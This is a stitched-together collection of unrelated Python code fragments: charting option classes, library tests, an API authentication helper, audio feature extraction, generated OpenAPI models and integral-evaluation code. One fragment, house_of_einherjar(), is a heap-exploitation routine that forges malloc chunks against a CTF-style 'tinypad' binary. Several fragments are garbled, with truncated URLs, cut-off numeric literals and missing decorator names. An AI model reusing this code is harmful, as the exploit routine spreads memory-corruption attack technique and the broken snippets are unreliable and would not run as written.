self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class OptionSeriesBarSonificationContexttracksMappingTime(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
(eq=False)
class Argument(Expression):
info: str = ''
type_string: Optional[str] = None
name: Optional[str] = None
def id(self):
return id_str(self, 3)
def __str__(self):
arg = (self.name if self.name else f'arg_{self.id}')
return f'{{{arg}}}'
__repr__ = __str__ |
def _split_periods(curr_data: pd.DataFrame, ref_data: pd.DataFrame, feature_name: str):
max_ref_date = ref_data[feature_name].max()
min_curr_date = curr_data[feature_name].min()
if (curr_data.loc[((curr_data[feature_name] == min_curr_date), 'number_of_items')].iloc[0] > ref_data.loc[((ref_data[feature_name] == max_ref_date), 'number_of_items')].iloc[0]):
curr_data.loc[((curr_data[feature_name] == min_curr_date), 'number_of_items')] = (curr_data.loc[((curr_data[feature_name] == min_curr_date), 'number_of_items')] + ref_data.loc[((ref_data[feature_name] == max_ref_date), 'number_of_items')])
ref_data = ref_data[(ref_data[feature_name] != max_ref_date)]
else:
ref_data.loc[((ref_data[feature_name] == max_ref_date), 'number_of_items')] = (ref_data.loc[((ref_data[feature_name] == max_ref_date), 'number_of_items')] + curr_data.loc[((curr_data[feature_name] == min_curr_date), 'number_of_items')])
curr_data = curr_data[(curr_data[feature_name] != min_curr_date)]
return (curr_data, ref_data) |
def test_bulk_rejected_documents_are_retried(sync_client):
failing_client = FailingBulkClient(sync_client, fail_with=ApiError(message='Rejected!', body={}, meta=ApiResponseMeta(status=429, headers={}, duration=0, node=None)))
docs = [{'_index': 'i', '_id': 47, 'f': 'v'}, {'_index': 'i', '_id': 45, 'f': 'v'}, {'_index': 'i', '_id': 42, 'f': 'v'}]
results = list(helpers.streaming_bulk(failing_client, docs, index='i', raise_on_exception=False, raise_on_error=False, chunk_size=1, max_retries=1, initial_backoff=0))
assert (3 == len(results))
print(results)
assert ([True, True, True] == [r[0] for r in results])
sync_client.indices.refresh(index='i')
res = sync_client.search(index='i')
assert ({'value': 3, 'relation': 'eq'} == res['hits']['total'])
assert (4 == failing_client._called) |
class YotpoReviewsAuthenticationStrategy(AuthenticationStrategy):
name = 'yotpo_reviews'
configuration_model = YotpoReviewsAuthenticationConfiguration
def __init__(self, configuration: YotpoReviewsAuthenticationConfiguration):
self.store_id = configuration.store_id
self.secret_key = configuration.secret_key
def add_authentication(self, request: PreparedRequest, connection_config: ConnectionConfig) -> PreparedRequest:
secrets = cast(Dict, connection_config.secrets)
response = post(url=f' secrets)}/access_tokens', json={'secret': assign_placeholders(self.secret_key, secrets)})
if response.ok:
json_response = response.json()
access_token = json_response.get('access_token')
else:
raise FidesopsException(f'Unable to get access token {response.json()}')
request.headers['X-Yotpo-Token'] = access_token
request.headers['x-utoken'] = access_token
return request |
('pybikes.data._import', _import)
('pybikes.data._iter_data', _iter_data)
('pybikes.data._t_cache', {})
('pybikes.data._traversor', _traverse_lib())
class TestData():
def test_find_not_found(self):
with pytest.raises(BikeShareSystemNotFound):
find('abracadabra')
def test_find_single_class(self):
(mod, cls, i_data) = find('foobar-rocks')
assert (mod == 'foobar')
assert (cls == 'Foobar')
assert (i_data == foobar_data['instances'][0])
def test_find_multi_class(self):
(mod, cls, i_data) = find('bazbar-sucks')
assert (mod == 'barbaz')
assert (cls == 'BazBar')
assert (i_data == barbaz_data['class']['BazBar']['instances'][1])
def test_get_not_found(self):
with pytest.raises(BikeShareSystemNotFound):
get('abracadabra')
def test_get_instances(self):
assert isinstance(get('foobar-rocks'), foobar.Foobar)
assert isinstance(get('foobar-sucks'), foobar.Foobar)
assert isinstance(get('barbaz-rocks'), barbaz.BarBaz)
assert isinstance(get('barbaz-sucks'), barbaz.BarBaz)
assert isinstance(get('bazbar-rocks'), barbaz.BazBar)
assert isinstance(get('bazbar-sucks'), barbaz.BazBar)
def test_get_instance_needs_key(self):
foo = get('bazbar-summer', key='foobar')
assert (getattr(foo, 'key') == 'foobar')
def test_get_instance_needs_key_error(self):
with pytest.raises(Exception):
get('bazbar-summer') |
class ArchivedResults(enum.Enum):
INCLUDE = (1, None)
EXCLUDE = (2, False)
ONLY = (3, True)
def __init__(self, int_value, api_value):
self.int_value = int_value
self.api_value = api_value
def __str__(self):
return self.name.lower()
def __repr__(self):
return str(self)
def argparse(s):
try:
return ArchivedResults[s.upper()]
except KeyError:
return s |
def test_call_undefined_error_message_with_container_instance_parent():
class UserService():
def __init__(self, database):
self.database = database
class Container(containers.DeclarativeContainer):
database = providers.Dependency()
user_service = providers.Factory(UserService, database=database)
container = Container()
with raises(errors.Error, match='Dependency "Container.database" is not defined'):
container.user_service() |
def greet_user():
path = Path('username.json')
username = get_stored_username(path)
if username:
print(f'Welcome back, {username}!')
else:
username = input('What is your name? ')
contents = json.dumps(username)
path.write_text(contents)
print(f"We'll remember you when you come back, {username}!") |
class ExtensionRegistryTestMixin():
def test_empty_registry(self):
registry = self.registry
extensions = registry.get_extensions('my.ep')
self.assertEqual(0, len(extensions))
extension_points = registry.get_extension_points()
self.assertEqual(0, len(extension_points))
def test_add_extension_point(self):
registry = self.registry
registry.add_extension_point(self.create_extension_point('my.ep'))
extensions = registry.get_extensions('my.ep')
self.assertEqual(0, len(extensions))
extension_points = registry.get_extension_points()
self.assertEqual(1, len(extension_points))
self.assertEqual('my.ep', extension_points[0].id)
def test_get_extension_point(self):
registry = self.registry
registry.add_extension_point(self.create_extension_point('my.ep'))
extension_point = registry.get_extension_point('my.ep')
self.assertNotEqual(None, extension_point)
self.assertEqual('my.ep', extension_point.id)
def test_get_extension_point_return_none_if_not_found(self):
self.assertIsNone(self.registry.get_extension_point('i.do.not.exist'))
def test_get_extensions_mutation_no_effect_if_undefined(self):
extensions = self.registry.get_extensions('my.ep')
extensions.append([[1, 2]])
self.assertEqual(self.registry.get_extensions('my.ep'), [])
def test_remove_empty_extension_point(self):
registry = self.registry
registry.add_extension_point(self.create_extension_point('my.ep'))
registry.remove_extension_point('my.ep')
extension_points = registry.get_extension_points()
self.assertEqual(0, len(extension_points))
def test_remove_non_existent_extension_point(self):
registry = self.registry
with self.assertRaises(UnknownExtensionPoint):
registry.remove_extension_point('my.ep')
def test_remove_non_existent_listener(self):
registry = self.registry
def listener(registry, extension_point, added, removed, index):
self.listener_called = (registry, extension_point, added, removed)
with self.assertRaises(ValueError):
registry.remove_extension_point_listener(listener)
def create_extension_point(self, id, trait_type=List, desc=''):
return ExtensionPoint(id=id, trait_type=trait_type, desc=desc) |
class Permission(models.Model):
is_dummy = False
name = models.CharField(_('name'), max_length=80, unique=True)
alias = models.CharField(_('alias'), max_length=80)
class Meta():
app_label = 'gui'
verbose_name = _('Permission')
verbose_name_plural = _('Permissions')
def __unicode__(self):
return ('%s' % self.alias) |
class OptionPlotoptionsScatterSonificationContexttracksMappingRate(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
(Output('readiness-exclamation', 'style'), [Input('readiness-date', 'children')])
def show_readiness_exclamation(dummy):
show = {'display': 'inline-block', 'fontSize': '1rem', 'color': orange, 'paddingLeft': '1%'}
hide = {'display': 'none'}
max_sleep_date = app.session.query(func.max(ouraSleepSummary.report_date)).first()[0]
max_readiness_date = app.session.query(func.max(ouraReadinessSummary.report_date)).first()[0]
max_activity_date = app.session.query(func.max(ouraActivitySummary.summary_date)).first()[0]
app.session.remove()
max_date = max([max_sleep_date, max_readiness_date, max_activity_date])
readiness_style = (show if (max_readiness_date != max_date) else hide)
return readiness_style |
def gtp_rat_timeout_profile(data, fos):
vdom = data['vdom']
state = data['state']
gtp_rat_timeout_profile_data = data['gtp_rat_timeout_profile']
filtered_data = underscore_to_hyphen(filter_gtp_rat_timeout_profile_data(gtp_rat_timeout_profile_data))
if ((state == 'present') or (state is True)):
return fos.set('gtp', 'rat-timeout-profile', data=filtered_data, vdom=vdom)
elif (state == 'absent'):
return fos.delete('gtp', 'rat-timeout-profile', mkey=filtered_data['name'], vdom=vdom)
else:
fos._module.fail_json(msg='state must be present or absent!') |
def trace_galerkin_projection(degree, quad=False, conv_test_flag=0, mesh_res=None):
if (mesh_res is None):
mesh = UnitSquareMesh(10, 10, quadrilateral=quad)
elif isinstance(mesh_res, int):
mesh = UnitSquareMesh((2 ** mesh_res), (2 ** mesh_res), quadrilateral=quad)
else:
raise ValueError('Integers or None are only accepted for mesh_res.')
(x, y) = SpatialCoordinate(mesh)
T = FunctionSpace(mesh, 'HDiv Trace', degree)
lambdar = TrialFunction(T)
gammar = TestFunction(T)
if (conv_test_flag == 0):
V = FunctionSpace(mesh, 'CG', degree)
f = Function(V)
elif (conv_test_flag == 1):
hdv = FunctionSpace(mesh, 'CG', (degree + 1))
f = Function(hdv)
else:
raise ValueError('conv_test should be either 0 or 1')
f.interpolate((cos(((x * pi) * 2)) * cos(((y * pi) * 2))))
a = ((inner(lambdar, gammar) * ds) + (inner(lambdar('+'), gammar('+')) * dS))
l = ((inner(f, gammar) * ds) + (inner(f('+'), gammar('+')) * dS))
t = Function(T)
solve((a == l), t, solver_parameters={'ksp_rtol': 1e-14})
trace_error = sqrt(assemble(((FacetArea(mesh) * inner((t - f)('+'), (t - f)('+'))) * dS)))
return trace_error |
class MyClass():
def __init__(self, a, b):
self.a = a
self.b = b
def compute(self, n):
a = self.a
b = self.b
if ts.is_transpiled:
result = ts.use_block('block0')
else:
result = np.zeros_like(a)
for _ in range(n):
result += ((a ** 2) + (b ** 3))
return result |
def genomicRegion(string):
region = ''.join(string.split())
if (region == ''):
return None
if (sys.version_info[0] == 2):
region = region.translate(None, ',;|!{}()').replace('-', ':')
if (sys.version_info[0] == 3):
region = region.translate(str.maketrans('', '', ',;|!{}()')).replace('-', ':')
if (len(region) == 0):
raise argparse.ArgumentTypeError('{} is not a valid region'.format(string))
return region |
class Definition(Block):
NAME = 'define'
def on_create(self, parent):
return etree.SubElement(parent, 'dl')
def on_end(self, block):
remove = []
offset = 0
for (i, child) in enumerate(list(block)):
if (child.tag.lower() in ('dt', 'dd')):
continue
elif (child.tag.lower() not in ('ul', 'ol')):
if (child.tag.lower() == 'p'):
child.tag = 'dt'
else:
dt = etree.Element('dt')
dt.append(child)
block.insert((i + offset), dt)
block.remove(child)
else:
for li in list(child):
offset += 1
li.tag = 'dd'
block.insert((i + offset), li)
child.remove(li)
remove.append(child)
for el in remove:
block.remove(el) |
def decode_snooz(snooz):
(version, last_timestamp_ms) = struct.unpack_from('=bQ', snooz)
if ((version != 1) and (version != 2)):
sys.stderr.write(('Unsupported btsnooz version: %s\n' % version))
exit(1)
decompressed = zlib.decompress(snooz[9:])
sys.stdout.buffer.write(b'btsnoop\x00\x00\x00\x00\x01\x00\x00\x03\xea')
if (version == 1):
decode_snooz_v1(decompressed, last_timestamp_ms)
elif (version == 2):
decode_snooz_v2(decompressed, last_timestamp_ms) |
def validate_boolean(rule):
if (str(rule['value']).lower() in ('1', 't', 'true')):
return True
elif (str(rule['value']).lower() in ('0', 'f', 'false')):
return False
else:
msg = (INVALID_TYPE_MSG.format(**rule) + '. Use true/false')
raise InvalidParameterException(msg) |
class ProcessData():
def __init__(self, silence_thresh_dB, sr, device, seq_len, crepe_params, loudness_params, rms_params, hop_size, max_len, center, overlap=0.0, debug=False, contiguous=False, contiguous_clip_noise=False):
super().__init__()
self.silence_thresh_dB = silence_thresh_dB
self.crepe_params = crepe_params
self.sr = sr
self.device = torch.device(device)
self.seq_len = seq_len
self.loudness_params = loudness_params
self.rms = rms_params
self.max_len = max_len
self.hop_size = hop_size
self.feat_size = ((self.max_len * self.sr) // self.hop_size)
self.audio_size = (self.max_len * self.sr)
self.center = center
self.overlap = overlap
self.debug = debug
self.contiguous = contiguous
self.contiguous_clip_noise = contiguous_clip_noise
def set_confidence(self, confidence):
self.crepe_params.confidence_threshold = confidence
def process_indices(self, indices: list) -> list:
max_len = (self.max_len * self.sr)
def expand_long(indices_tuple: tuple) -> list:
if ((indices_tuple[1] - indices_tuple[0]) > max_len):
ret = [(start, (start + max_len)) for start in np.arange(indices_tuple[0], (indices_tuple[1] - max_len), max_len)]
ret.append((ret[(- 1)][(- 1)], min((ret[(- 1)][(- 1)] + max_len), indices_tuple[1])))
return ret
else:
return [indices_tuple]
new_indices = [*map(expand_long, indices)]
new_indices = functools.reduce(operator.concat, new_indices, [])
new_indices = [x for x in new_indices if ((x[1] - x[0]) > (self.seq_len * self.sr))]
return new_indices
def pad_to_expected_size(self, features, expected_size, pad_value):
if (self.contiguous == True):
pad_len = ((((features.shape[(- 1)] // expected_size) + 1) * expected_size) - features.shape[(- 1)])
features = np.pad(features, (0, pad_len), 'constant', constant_values=pad_value)
return features
else:
if self.debug:
print('Feat shape {} - expected size: {}'.format(features.shape[(- 1)], expected_size))
if (features.shape[(- 1)] < expected_size):
pad_len = (expected_size - features.shape[(- 1)])
features = np.pad(features, (0, pad_len), 'constant', constant_values=pad_value)
if (features.shape[(- 1)] > expected_size):
raise Exception('Expected size is smaller than current value')
return features
def extract_f0(self, audio):
(f0, confidence) = spectral_ops.calc_f0(audio, rate=self.sr, hop_size=self.hop_size, fmin=self.crepe_params.fmin, fmax=self.crepe_params.fmax, model=self.crepe_params.model, batch_size=self.crepe_params.batch_size, device=self.device, center=self.center)
if (confidence.mean() < self.crepe_params.confidence_threshold):
raise ValueError('Low f0 confidence')
f0 = self.pad_to_expected_size(f0, expected_size=self.feat_size, pad_value=0)
return f0
def calc_loudness(self, audio):
loudness = spectral_ops.calc_loudness(audio, rate=self.sr, n_fft=self.loudness_params.nfft, hop_size=self.hop_size, center=self.center)
loudness = self.pad_to_expected_size(loudness, expected_size=self.feat_size, pad_value=(- _DB_RANGE))
return loudness
def calc_rms(self, audio):
rms = spectral_ops.calc_power(audio, frame_size=self.rms.frame_size, hop_size=self.hop_size, pad_end=True)
rms = self.pad_to_expected_size(rms, expected_size=self.feat_size, pad_value=(- _DB_RANGE))
return rms
def save_data(self, audio, f0, loudness, rms, h5f, counter):
h5f.create_dataset(f'{counter}_audio', data=audio)
h5f.create_dataset(f'{counter}_f0', data=f0)
h5f.create_dataset(f'{counter}_loudness', data=loudness)
h5f.create_dataset(f'{counter}_rms', data=rms)
return (counter + 1)
def init_h5(self, data_dir):
return h5py.File((data_dir / f'{self.sr}.h5'), 'w')
def close_h5(self, h5f):
h5f.close()
'\n Main audio processing function\n '
def run_on_files(self, data_dir, input_dir, output_dir):
audio_files = list((input_dir / data_dir).glob('*.wav'))
output_dir = (output_dir / data_dir)
output_dir.mkdir(exist_ok=True)
h5f = self.init_h5(output_dir)
counter = 0
for audio_file in tqdm(audio_files):
if self.debug:
print('Processing: {}'.format(audio_file))
(data, sr) = librosa.load(audio_file.as_posix(), sr=self.sr)
data = librosa.util.normalize(data)
sounds_indices = []
if self.contiguous:
sounds_indices.append([0, len(data)])
else:
sounds_indices = librosa.effects.split(data, top_db=self.silence_thresh_dB)
sounds_indices = self.process_indices(sounds_indices)
if (len(sounds_indices) == 0):
continue
for indices in sounds_indices:
audio = data[indices[0]:indices[1]]
if self.debug:
print('\tIndexes: {} {} - len: {}'.format(indices[0], indices[1], (indices[1] - indices[0])))
try:
f0 = self.extract_f0(audio)
except ValueError:
continue
loudness = self.calc_loudness(audio)
rms = self.calc_rms(audio)
if self.contiguous:
if self.contiguous_clip_noise:
if self.debug:
print('[DEBUG] clipping noise')
clip_pos = (f0 > 1900.0)
loudness[clip_pos] = (- _DB_RANGE)
audio = self.pad_to_expected_size(audio, (f0.shape[0] * self.hop_size), 0)
else:
audio = self.pad_to_expected_size(audio, self.audio_size, 0)
if self.debug:
print(f' Store block {counter}: f0 : {f0.shape} - loudness : {loudness.shape} - rms {rms.shape} - audio : {audio.shape}')
counter = self.save_data(audio, f0, loudness, rms, h5f, counter)
self.close_h5(h5f)
def run_on_dirs(self, input_dir: Path, output_dir: Path):
folders = [x for x in input_dir.glob('./*') if x.is_dir()]
for folder in tqdm(folders):
self.run_on_files(folder.name, input_dir, output_dir) |
def dump_tags(location):
from pprint import pprint
mka = parse(location)
segment = mka['Segment'][0]
info = segment['Info'][0]
try:
timecodescale = info['TimecodeScale'][0]
except KeyError:
timecodescale = 1000000
length = ((info['Duration'][0] * timecodescale) / .0)
print(('Length = %s seconds' % length))
pprint(segment['Tags'][0]['Tag']) |
class DataTable(OptPlotly.DataChart):
def domain(self) -> DataDomain:
return self.sub_data('domain', DataDomain)
def set_domain(self, x, y=None):
self.domain.x = x
self.domain.y = (y or x)
def columnorder(self):
return self._attrs['columnorder']
def columnorder(self, val):
self._attrs['columnorder'] = val
def columnwidth(self):
return self._attrs['columnwidth']
def columnwidth(self, val):
self._attrs['columnwidth'] = val
def header(self) -> DataHeader:
return self.sub_data('header', DataHeader)
def cells(self) -> DataCells:
return self.sub_data('cells', DataCells) |
class ExpansionConverter(object):
def __init__(self, type_routes, type_expansions):
self.type_routes = type_routes
self.type_expansions = type_expansions
def dict_to_trees(self, expansion_dict):
trees = []
for (node_type, expansion_list) in six.iteritems(expansion_dict):
type_node = TypeNode(node_type=node_type)
for expansion_string in expansion_list:
expansion_node = type_node
for expansion_name in expansion_string.split('.'):
child_expansion_node = expansion_node.get_expansion(expansion_name)
if (not child_expansion_node):
type_expansion = self.type_expansions[expansion_node.type][expansion_name]
type_route = self.type_routes[cast(six.text_type, type_expansion['route'])]
if (type_expansion['destination_field'] == type_expansion['source_field']):
raise ValueError('Expansion configuration destination_field error: destination_field can not have the same name as the source_field: {}'.format(type_expansion['source_field']))
child_expansion_node = ExpansionNode(node_type=cast(six.text_type, type_expansion['type']), name=expansion_name, source_field=cast(six.text_type, type_expansion['source_field']), destination_field=cast(six.text_type, type_expansion['destination_field']), service=type_route['service'], action=type_route['action'], request_field=type_route['request_field'], response_field=type_route['response_field'], raise_action_errors=cast(bool, type_expansion.get('raise_action_errors', False)))
expansion_node.add_expansion(child_expansion_node)
expansion_node = child_expansion_node
trees.append(type_node)
return trees
def trees_to_dict(trees_list):
result = {}
for tree in trees_list:
result.update(tree.to_dict())
return result |
class SchemasVclResponse(ModelComposed):
allowed_values = {}
validations = {}
_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
_property
def openapi_types():
lazy_import()
return {'content': (str,), 'main': (bool,), 'name': (str,), 'service_id': (str,), 'version': (int,), 'created_at': (datetime, none_type), 'deleted_at': (datetime, none_type), 'updated_at': (datetime, none_type)}
_property
def discriminator():
return None
attribute_map = {'content': 'content', 'main': 'main', 'name': 'name', 'service_id': 'service_id', 'version': 'version', 'created_at': 'created_at', 'deleted_at': 'deleted_at', 'updated_at': 'updated_at'}
read_only_vars = {'service_id', 'version', 'created_at', 'deleted_at', 'updated_at'}
_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
composed_info = validate_get_composed_info(constant_args, kwargs, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
discarded_args = composed_info[3]
for (var_name, var_value) in kwargs.items():
if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', '_composed_instances', '_var_name_to_model_instances', '_additional_properties_model_instances'])
_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
composed_info = validate_get_composed_info(constant_args, kwargs, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
discarded_args = composed_info[3]
for (var_name, var_value) in kwargs.items():
if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')
_property
def _composed_schemas():
lazy_import()
return {'anyOf': [], 'allOf': [ServiceIdAndVersion, Timestamps, Vcl], 'oneOf': []} |
def extractTericherryWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if ('WATTT' in item['tags']):
return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
return False |
def house_of_einherjar():
delete(4)
fake_chunk1 = ('A' * 224)
fake_chunk1 += p64(((heap_base + 240) - tinypad))
add(232, fake_chunk1)
fake_chunk2 = p64(256)
fake_chunk2 += p64(((heap_base + 240) - tinypad))
fake_chunk2 += (p64(6299712) * 4)
edit(2, fake_chunk2)
delete(2) |
def get_weather(longitude: float, latitude: float):
logger = get_run_logger()
logger.info(f'Getting weather of latitude={latitude} and longitude={longitude}')
api_endpoint = f'
response = requests.get(api_endpoint)
if (response.status_code == 200):
weather_data = json.loads(response.text)
logger.debug(weather_data)
return weather_data
else:
raise Exception(('Failed to query ' + api_endpoint)) |
class SearchPageForm(FlaskForm):
search_query = StringField(_('Criteria'), validators=[DataRequired(), Length(min=3, max=50)])
search_types = SelectMultipleField(_('Content'), validators=[DataRequired()], choices=[('post', _('Post')), ('topic', _('Topic')), ('forum', _('Forum')), ('user', _('Users'))])
submit = SubmitField(_('Search'))
def get_results(self):
search_actions = {'post': Post.query.whooshee_search, 'topic': Topic.query.whooshee_search, 'forum': Forum.query.whooshee_search, 'user': User.query.whooshee_search}
query = self.search_query.data
types = self.search_types.data
results = {}
for search_type in search_actions.keys():
if (search_type in types):
results[search_type] = search_actions[search_type](query)
return results |
def add_service():
def _add_service(fledge_url, service, service_branch, retries, installation_type='make', service_name='', enabled=True):
retval = utils.get_request(fledge_url, '/fledge/service')
for ele in retval['services']:
if (ele['type'].lower() == service):
return ele
PROJECT_ROOT = Path(__file__).parent.parent.parent.parent
def clone_make_install():
try:
subprocess.run(['{}/tests/system/python/scripts/install_c_service {} {}'.format(PROJECT_ROOT, service_branch, service)], shell=True, check=True)
except subprocess.CalledProcessError:
assert False, '{} service installation failed'.format(service)
if (installation_type == 'make'):
clone_make_install()
elif (installation_type == 'package'):
try:
subprocess.run(['sudo {} install -y fledge-service-{}'.format(pytest.PKG_MGR, service)], shell=True, check=True)
except subprocess.CalledProcessError:
assert False, '{} package installation failed!'.format(service)
else:
return 'Skipped {} service installation. Installation mechanism is set to {}.'.format(service, installation_type)
data = {'name': '{}'.format(service_name), 'type': '{}'.format(service), 'enabled': enabled}
retval = utils.post_request(fledge_url, '/fledge/service', data)
assert (service_name == retval['name'])
return retval
return _add_service |
def extractMegruminatesWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def COMMETHOD(idlflags, restype, methodname, *argspec):
helptext = (''.join((t for t in idlflags if isinstance(t, helpstring))) or None)
(paramflags, argtypes) = _resolve_argspec(argspec)
if ('propget' in idlflags):
name = ('_get_%s' % methodname)
elif ('propput' in idlflags):
name = ('_set_%s' % methodname)
elif ('propputref' in idlflags):
name = ('_setref_%s' % methodname)
else:
name = methodname
return _ComMemberSpec(restype, name, argtypes, paramflags, tuple(idlflags), helptext) |
(suppress_health_check=[HealthCheck.function_scoped_fixture])
(ecl_runs)
def test_gridprop_unrst_same_formatted(tmp_path, ecl_run):
funrst = (tmp_path / 'file.FUNRST')
resfo.write(funrst, resfo.read(ecl_run.unrst_file), resfo.Format.FORMATTED)
ecl_run.unrst_file.seek(0)
funrst_gridprop = xtgeo.gridproperty_from_file(funrst, fformat='funrst', name=ecl_run.property_name, grid=ecl_run.grid, date=ecl_run.xtgeo_step_date)
unrst_gridprop = xtgeo.gridproperty_from_file(ecl_run.unrst_file, fformat='unrst', name=ecl_run.property_name, grid=ecl_run.grid, date=ecl_run.xtgeo_step_date)
assert (unrst_gridprop.name == funrst_gridprop.name)
assert np.array_equal(unrst_gridprop.values, funrst_gridprop.values) |
class FunctionalModule():
name: str
description: str
method: Callable[(..., Any)]
signature: dict[(str, dict)]
def __init__(self, name, description, method, signature):
self.name = name
self.description = description
self.method = method
self.signature = signature |
class FileParamType(click.ParamType):
name = 'file path'
def convert(self, value: typing.Any, param: typing.Optional[click.Parameter], ctx: typing.Optional[click.Context]) -> typing.Any:
remote_path = (None if getattr(ctx.obj, 'is_remote', False) else False)
if (not FileAccessProvider.is_remote(value)):
p = pathlib.Path(value)
if ((not p.exists()) or (not p.is_file())):
raise click.BadParameter(f'parameter should be a valid file path, {value}')
return FlyteFile(path=value, remote_path=remote_path) |
def upgrade():
op.create_table('regcode', sa.Column('id', sa.Integer(), nullable=False), sa.Column('password', sa.LargeBinary(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.PrimaryKeyConstraint('id'))
op.create_index(op.f('ix_regcode_password'), 'regcode', ['password'], unique=False) |
def create_arnold_stand_in(path=None):
if (not pm.objExists('ArnoldStandInDefaultLightSet')):
pm.createNode('objectSet', name='ArnoldStandInDefaultLightSet', shared=True)
pm.lightlink(object='ArnoldStandInDefaultLightSet', light='defaultLightSet')
stand_in = pm.createNode('aiStandIn', n='ArnoldStandInShape')
stand_in.setAttr('visibleInReflections', True)
stand_in.setAttr('visibleInRefractions', True)
pm.sets('ArnoldStandInDefaultLightSet', add=stand_in)
if path:
stand_in.setAttr('dso', path)
return stand_in |
class OptionSeriesSplineStatesInactive(Options):
def animation(self) -> 'OptionSeriesSplineStatesInactiveAnimation':
return self._config_sub_data('animation', OptionSeriesSplineStatesInactiveAnimation)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def opacity(self):
return self._config_get(0.2)
def opacity(self, num: float):
self._config(num, js_type=False) |
def _get_feature_subfeature_phase():
load_feature_list = list_features()
list_without_provider = list(set([(f, s, (ph[0] if ph else '')) for (p, f, s, *ph) in load_feature_list]))
detailed_providers_list = []
for (feature, subfeature, *phase) in list_without_provider:
detailed_params = pytest.param(feature, subfeature, (phase[0] if phase else ''), marks=[getattr(pytest.mark, feature), getattr(pytest.mark, subfeature)])
detailed_providers_list.append(detailed_params)
return sorted(detailed_providers_list) |
def dipole3d_20(ax, da, A, bx, db, B, R):
result = numpy.zeros((3, 6, 1), dtype=float)
x0 = ((ax + bx) ** (- 1.0))
x1 = (x0 * ((ax * A[0]) + (bx * B[0])))
x2 = (- x1)
x3 = (x2 + A[0])
x4 = (x2 + R[0])
x5 = (x3 * x4)
x6 = ((ax * bx) * x0)
x7 = ((((5. * da) * db) * (x0 ** 1.5)) * numpy.exp(((- x6) * ((((A[0] - B[0]) ** 2) + ((A[1] - B[1]) ** 2)) + ((A[2] - B[2]) ** 2)))))
x8 = (1. * x7)
x9 = (0. * x8)
x10 = (x0 * ((ax * A[1]) + (bx * B[1])))
x11 = (- x10)
x12 = (x11 + A[1])
x13 = (0.5 * x0)
x14 = (x7 * (x13 + x5))
x15 = (x0 * ((ax * A[2]) + (bx * B[2])))
x16 = (- x15)
x17 = (x16 + A[2])
x18 = ((x12 ** 2) + x13)
x19 = (0. * x8)
x20 = (x19 * x4)
